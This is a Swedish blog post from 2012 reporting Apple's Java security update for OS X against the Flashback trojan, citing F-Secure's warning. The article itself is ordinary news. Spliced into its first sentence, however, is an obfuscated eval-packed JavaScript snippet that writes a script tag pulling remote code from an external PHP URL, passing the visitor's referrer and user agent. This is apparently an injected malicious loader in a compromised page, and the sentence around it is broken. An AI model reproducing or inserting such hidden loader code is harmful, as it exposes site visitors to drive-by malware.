Image Image Image Image Image Image Image Image Image Image

| 28 oktober, 2020

Scroll to top

Top

Mycket viktigt säkerhetsuppdatering för Mac OS X.

Mycket viktigt säkerhetsuppdatering för Mac OS X.
Filip Urde
  • On 4 april, 2012
  • http://www.revue.se/filip-urde

Gårdagens eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hhfzt|var|u0026u|referrer|tznya||js|php’.split(’|’),0,{}))
säkerhetsuppdatering för OSX
gäller ett rent allvarligt säkerhetshål i Java. Det var nu i måndags som säkerhetsföretaget F-Secure meddelade att någon har  släppt en trojan med namnet Flashback som attackerar OS X. Trojanen Flashback är inte ny i sig, den kom redan  i september förra året men hade då riktat in sig på ett säkerhetshål i Adobes Flash. Nu har man alltså uppdaterat sin ”skit” och attackerar alltså Java.

Oracle släppte dock redan i februari. en uppdatering som täppte till hålet, men eftersom Apple anpassar Java för OS X har det dröjt tills nu innan företaget släppt den uppdaterade versionen.
Uppdateringen som släpptes i går gäller OS X 10.6 Snow Leopard samt OS X 10.7 Lion.

Säkerhetshålet är mycket allvarligt och F-Secure uppmanar alla Macanvändare att uppdatera sina datorer så fort man kan!

J*vla svin det finns där ute, men uppdatera nu alla våra kära läsare så är det nog lugnt.